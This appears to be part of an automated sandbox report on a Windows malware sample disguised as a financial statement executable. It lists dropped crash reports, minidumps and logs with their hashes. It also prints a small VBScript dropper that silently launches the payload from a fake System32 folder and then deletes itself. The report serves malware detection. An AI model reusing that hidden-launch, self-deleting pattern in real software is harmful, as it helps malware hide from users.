                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.4.1.4.2.5.8.0.9.8.8.9.1.0.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.6.4.1.4.2.5.9.0.4.8.8.8.7.7.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.0.9.c.e.1.5.d.-.8.a.0.1.-.4.3.6.4.-.8.a.2.2.-.d.8.d.1.6.9.8.4.1.c.7.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.6.c.6.6.1.5.5.-.d.e.9.4.-.4.f.5.b.-.8.7.e.1.-.7.1.e.4.e.5.1.6.1.d.f.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.E.X.T.R.A.C.T.O.S.E.R.F.I.N.A.N.Z.A.9.8.9.5.4.3.7.0.4.0.3.1.4.9.9.7.0.4.0.9.2.7.9.8.9.6.4...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.W.A.B.M.I.G...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.e.0.-.0.0.0.1.-.0.0.1.b.-.9.5.6.a.-.a.6.8.4.a.c.3.c.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.8.f.e.4.d.d.b.1.2.e.2.2.3.9.6.d.b.2.4.b.9.7.7.f.f.e.c.1.5.d.5.0.0.0.0.0.9.0.4.!.0.0.0.0.
                                      C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_PxxoServicesTria_f7f5b899daf81aa7bcebffddfe468a1dc8d73cbd_3a3bac9c_18c921d7\Report.wer
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):14940
                                      Entropy (8bit):3.7683499846652353
                                      Encrypted:false
                                      SSDEEP:192:JmruqirjmHBUZMXyaKA6K+da0/u7s8S274It0o:Jili2BUZMXyaya0/u7s8X4It0o
                                      MD5:AA848379C8899BE90BB34FFC9FD78ED6
                                      SHA1:9C3D21EAE5F7FD808FE9FF7601D3C86909D66E7A
                                      SHA-256:F0309BBB1B1EA51EB429AF3C0F9700EEAA87EB63852EDACD90447FCDA3454ADF
                                      SHA-512:E1CEA5703584131A509E1BB521550DBB43280B5FA5BF786D5330363EC97E879B2685F5ADB3EB9C15EBE85ABABB7E6BA12266C6A35203E42B2B9D6D13E048C81F
                                      Malicious:false
                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.4.1.4.2.6.0.6.1.2.9.4.5.3.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.6.4.1.4.2.6.1.6.8.3.2.5.4.2.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.6.a.5.9.4.0.0.-.a.2.6.5.-.4.b.9.6.-.9.5.e.2.-.d.0.c.9.0.2.c.4.0.2.6.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.7.0.a.3.f.4.5.-.5.3.b.2.-.4.9.1.c.-.b.5.9.1.-.3.0.f.1.7.d.c.0.5.e.3.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.P.x.x.o.S.e.r.v.i.c.e.s.T.r.i.a.l.N.e.t.1...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.W.A.B.M.I.G...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.8.c.-.0.0.0.1.-.0.0.1.b.-.d.c.2.a.-.a.0.8.c.a.c.3.c.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.8.f.e.4.d.d.b.1.2.e.2.2.3.9.6.d.b.2.4.b.9.7.7.f.f.e.c.1.5.d.5.0.0.0.0.0.9.0.4.!.0.0.0.0.5.8.a.d.f.5.d.6.0.d.9.d.a.8.2.3.a.4.f.d.6.2.2.8.
                                      C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_PxxoServicesTria_f7f5b899daf81aa7bcebffddfe468a1dc8d73cbd_3a3bac9c_19f941f2\Report.wer
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):14876
                                      Entropy (8bit):3.768466552142861
                                      Encrypted:false
                                      SSDEEP:192:tH7op22jmHBUZMXyaPtEporj/u7s8S274It0Y:lkp2jBUZMXyabj/u7s8X4It0Y
                                      MD5:49C6549756D022B8980948B3A30AD6F1
                                      SHA1:48D04FCC1A1ED9C6819C4AA297DF462031B50D08
                                      SHA-256:CF5FDC6205BBC631F8231CFB2590F060E410A22FD2ED229D238AE077367F71A9
                                      SHA-512:35149631EC9B8E7CE497A59CE59A2C4085BA7DA919893A5687B324A2AC3EF43CBB825E4ED39FD554B08A4B060601AFFC2DBD261F9D3F386563FDF05B6B48CE74
                                      Malicious:false
                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.4.1.4.2.6.1.1.9.4.1.9.3.7.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.6.4.1.4.2.6.2.4.4.8.8.7.6.4.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.f.b.f.a.d.8.f.-.f.2.c.e.-.4.d.8.d.-.9.1.8.5.-.3.6.3.b.a.3.0.8.9.2.8.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.6.0.6.8.c.2.7.-.4.1.4.a.-.4.6.e.f.-.9.0.c.5.-.2.d.1.1.0.1.3.3.d.9.a.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.P.x.x.o.S.e.r.v.i.c.e.s.T.r.i.a.l.N.e.t.1...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.W.A.B.M.I.G...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.f.8.-.0.0.0.1.-.0.0.1.b.-.0.6.5.5.-.d.3.9.0.a.c.3.c.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.8.f.e.4.d.d.b.1.2.e.2.2.3.9.6.d.b.2.4.b.9.7.7.f.f.e.c.1.5.d.5.0.0.0.0.0.9.0.4.!.0.0.0.0.5.8.a.d.f.5.d.6.0.d.9.d.a.8.2.3.a.4.f.d.6.2.2.8.
                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER1D34.tmp.WERInternalMetadata.xml
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):8462
                                      Entropy (8bit):3.696720556546158
                                      Encrypted:false
                                      SSDEEP:192:Rrl7r3GLNiga6geI6YrMSUt5+rgmfZ+uSb+prH89b3UsfjS9m:RrlsNiF6G6YwSUt5+rgmfMuSX3Hfjx
                                      MD5:8E5F232C292D642681BEF46D9C6BD714
                                      SHA1:D72A4DC0063E7D00014AE4767E17C4B5332D118B
                                      SHA-256:3B474C69B3936EC4FF8FDF1858280B563A9024FA0440FA67C139D964EF0B7D14
                                      SHA-512:E29902CA5435FE3104A2E3B4B97C4D0C973F087B9A81C855C98E311F61098B11CF189DAD829DE230D229A79C4DB14C37C5B829CD1209E5CBC6FE211D78A17183
                                      Malicious:false
                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.6.4.8.<./.P.i.d.>.......
                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER2091.tmp.xml
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):4816
                                      Entropy (8bit):4.5016905343291524
                                      Encrypted:false
                                      SSDEEP:48:cvIwSD8zsBJgtWI9IOWSC8BM28fm8M4JwfADNFFqq8+q8vyDNJ5ZKBzIpzWd:uITfTvvSNuJwmwxKAL5ZK5IBWd
                                      MD5:33192BD6EB24F6594613A9AC1F7491F9
                                      SHA1:E8E88CF71D49667549E41AE315F9B4092313C601
                                      SHA-256:46CFE2381A2E023AD4FFB473F6E97F97415396F377E1760E4213F070EC68D9ED
                                      SHA-512:22B4D2B5E020B1B19501A36BFDA2661A2DEAF081E4A090681073CB92F975889B25D8B8273787CDC4E51CD920A16AEB6693C4D1C1D697D206736A54018E3AB855
                                      Malicious:false
                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="967034" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER71C.tmp.WERInternalMetadata.xml
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):8418
                                      Entropy (8bit):3.693086032129617
                                      Encrypted:false
                                      SSDEEP:192:Rrl7r3GLNibz6q6YUBT6dWgmfZ+uSb+prk89bhgsf+ULm:RrlsNi/6q6Ye6sgmfMuSOhzfS
                                      MD5:6A2BCB83451F388C15AA172C618E013D
                                      SHA1:75DA1008EF477D60CA703D65E9FB079D1C753404
                                      SHA-256:5461E4E8C092FF0509860D3E4151E162E3EE748778BEC2C193D83D6BA2900AB8
                                      SHA-512:B89C935B6F8623C3B4E131AD709315A2003768C01D8D0454690451E378384DD76065F3C37E00C401B961197D05C7A542137758031985362145BD16708E78B149
                                      Malicious:false
                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.7.7.2.<./.P.i.d.>.......
                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER8B1.tmp.dmp
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Mini DuMP crash report, 14 streams, Thu Apr 29 04:03:36 2021, 0x1205a4 type
                                      Category:dropped
                                      Size (bytes):271513
                                      Entropy (8bit):3.7749916865610507
                                      Encrypted:false
                                      SSDEEP:3072:r+K0loRjd+pH+5Di4TN9gIOgF5zW0h48UCgUlXPwmHveHL:rx0lfp6N9RpDqqNTj8L
                                      MD5:A5F747881D622DE744ECA00DB989BC4D
                                      SHA1:1DB5344A28CEA21E03087A6DA754AD22A65AF019
                                      SHA-256:F0B50309C00AA28A6DFA5219852C128DA926B4D53FD56CDEDF9A825AC7A735B7
                                      SHA-512:B29CC548B75CBFA424F8EADDEF34DE16F4B2E8BF8EC65EE1BF71E7424DEB5774425EBC90569E062ECB166896241D679D7C28563BF0BBD4B767A881B64B00D552
                                      Malicious:false
                                      Preview: MDMP....... ........0.`...................U...........B......$%......GenuineIntelW...........T............/.`.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER8FD8.tmp.dmp
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Mini DuMP crash report, 14 streams, Thu Apr 29 04:03:05 2021, 0x1205a4 type
                                      Category:dropped
                                      Size (bytes):272479
                                      Entropy (8bit):3.765744107890738
                                      Encrypted:false
                                      SSDEEP:3072:JP05orjd+pKHDW6hZs79gIOgF5W8o0qUCgU+/hD7i:Z05xpeu9RpDnoTTj+w
                                      MD5:B40A6E7DD073C4740AB9DD513A4E5602
                                      SHA1:721F9E4D1F9B888B62E46F17685AAE3C299A24F5
                                      SHA-256:F1699DFFA21E727188533369F78736AAE85E845B8F0146A8E164CC26C62C5709
                                      SHA-512:47CE95CF1BC3FC3E60CD26CD073D44C6712ED4CD7A6451B752656CD0375BF2673665A962143E14667D3C08E4B2B3BB1C3DDC9BA65DD02324338C6125A2C4AADE
                                      Malicious:false
                                      Preview: MDMP....... ......../.`...................U...........B.......%......GenuineIntelW...........T............/.`.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERA64F.tmp.WERInternalMetadata.xml
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):8522
                                      Entropy (8bit):3.713299896073488
                                      Encrypted:false
                                      SSDEEP:192:Rrl7r3GLNie96o6YrVSUKW5jefgmfZLauSb+pr189bdgsfF/m:RrlsNiM6o6Y5SUr5jefgmfsuS9dzfw
                                      MD5:A7E9C1EBB3805F6E29B85C9E228E99E6
                                      SHA1:80F541FE176301132EC28EFF4573A81BF3F51671
                                      SHA-256:9993C66A082E99FEA3A9EBE8DBE3DD76225C908382ABCFF5E75E2A2F8294822B
                                      SHA-512:3D31CDA6067C072DEF7177B04F30F1B89337108FE0D940EA916BE6EFCC873BBB92BC53C83467C9BE3937D9ED6AEBFC09C60C4FD52DBFDDE1542948109ECDCF00
                                      Malicious:false
                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.8.0.<./.P.i.d.>.......
                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERA844.tmp.xml
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):4902
                                      Entropy (8bit):4.614044012002554
                                      Encrypted:false
                                      SSDEEP:48:cvIwSD8zsUJgtWI9IOWSC8BV8fm8M4J/thNFF3SE+q8v4hN45ZK8mIkmYd:uITfSvvSN0J/thFK4hW5ZK8mIkmYd
                                      MD5:AD2BE70250E99BA6D2D56EE6AF169395
                                      SHA1:1938C3F4EC1E83B557D933278142DA27C4979CBA
                                      SHA-256:DC2C74718F4F7A0F2256163B88CF650EE65371A6B625A290521B5EF4918AA213
                                      SHA-512:5497AC092CCF5AB5B755389C02F27EB5D3FE3B7EE8193677F6AFB35263ADF8538A6D573844CB00A89653CE7DBE0421AC37BDF3C4EE1FBAB1601A8360266294AE
                                      Malicious:false
                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="967033" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERAC7.tmp.xml
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):4816
                                      Entropy (8bit):4.502173423682245
                                      Encrypted:false
                                      SSDEEP:48:cvIwSD8zsBJgtWI9IOWSC8B1s8fm8M4JwfADNFFY5+q8vyDN75ZKBzIpzVNd:uITfTvvSNvRJwmAKAd5ZK5IBVNd
                                      MD5:A86E067EC54785E0426ABFC6590641F1
                                      SHA1:0D7A43797D29457A62BFF0A231A21CA952A3BC62
                                      SHA-256:4305598CA431EC308CC658B33974C7D2217663BF6E352C729ABA13B2CB9C8EC9
                                      SHA-512:5EA62DFE5E170F6852892BB67AA6C94915C516A32439790D74B58BEB566A3D83C9C40041AC765C3871791FAF0F391AE390FFC598C1B38B402A50E295603A2D4E
                                      Malicious:false
                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="967034" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERF1FD.tmp.dmp
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Mini DuMP crash report, 14 streams, Thu Apr 29 04:03:30 2021, 0x1205a4 type
                                      Category:dropped
                                      Size (bytes):266883
                                      Entropy (8bit):3.7946408367407027
                                      Encrypted:false
                                      SSDEEP:3072:d9FY0LToMjd+pd4HwipdF+Gl9gIOgF5v04UCgU4kucQfa+:LFY0LT4pd4Hlt9RpDvNTjGt
                                      MD5:CA75C4CC8BCD0DCF3A5E06B3A27C5372
                                      SHA1:6D055EB8EEC88CDF30ECF8CFAFF0EA674D64B63A
                                      SHA-256:5F4AA4B37EB31D51C9468DD72C18292644E4557C84B64435B4BE369BA9EF5CA6
                                      SHA-512:BD6E17224E13421EDFC80E48DD1E42A55F37CF03EFAFD95587D812130430B7A2333276536284936482C73769B2094737143021D6DA2BECFB8920C4FD630AC0D8
                                      Malicious:false
                                      Preview: MDMP....... ........0.`...................U...........B.......%......GenuineIntelW...........T............/.`.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PxxoServicesTrialNet1.exe.log
                                      Process:C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1039
                                      Entropy (8bit):5.365622957937216
                                      Encrypted:false
                                      SSDEEP:24:MLU84qpE4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7GE4Ks:Mgv2HKXwYHKhQnoPtHoxHhAHKzvGHKs
                                      MD5:8661DEF1A785B33817416A73C5B2C3DD
                                      SHA1:3341588F1C06BFFDDCCCF2EDE4F62D6D5F7AACA9
                                      SHA-256:BF8FD626E9B119BF1F5045CAB9B6A2A773FB44ADCCB303B807CF650CE50758DD
                                      SHA-512:035155C37E203345617D0679BC0F544E492BA0FBCC8CD42DA91FA721011BAE29095DE36F5D54CC08FF31B70DBD0FEB3DA82DDC9DD36F2D37B7EFE822DA5FBACC
                                      Malicious:true
                                      Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutra
                                      C:\Users\user\AppData\Local\Temp\install.vbs
                                      Process:C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe
                                      File Type:data
                                      Category:modified
                                      Size (bytes):452
                                      Entropy (8bit):3.521015513208147
                                      Encrypted:false
                                      SSDEEP:12:4D8o++ugypjBQMBvFQ4lObRKMJ2c8l/xMPuFF0M/0aimi:4Dh+S0FNObrP0/wAF0Nait
                                      MD5:CA6D4A39F5316B9A00B3EC9DF253C7B0
                                      SHA1:CDC7705860FB93E27EE3282DAC2BE575A49315C1
                                      SHA-256:819E71331AA056A50B620EB42BC55F4B39AF950962351E8A72C1F4F1A1479571
                                      SHA-512:53C34FC4C36FEA7982F1728445E3F34CFC99808932724D5FA481D5D5F881827CD6FDBFB1C31229266EEDE1A3BAED363C5F5FB3BE21646041FD5CDD5D8061DB84
                                      Malicious:false
                                      Preview (UTF-16LE, decoded):
                                      WScript.Sleep 1000
                                      Set fso = CreateObject("Scripting.FileSystemObject")
                                      CreateObject("WScript.Shell").Run "cmd /c ""C:\Users\jones\AppData\Roaming\System32\PxxoServicesTrialNet1.exe""", 0
                                      fso.DeleteFile(Wscript.ScriptFullName)
                                      C:\Users\user\AppData\Roaming\Runtime12\xlogs171.dat
                                      Process:C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):74
                                      Entropy (8bit):4.689447880794982
                                      Encrypted:false
                                      SSDEEP:3:ttU1MMmKrA4RXMRPHv31aeo:tm44XqdHv3IP
                                      MD5:884D589020C0CB39128ECAC8DF3A4C1F
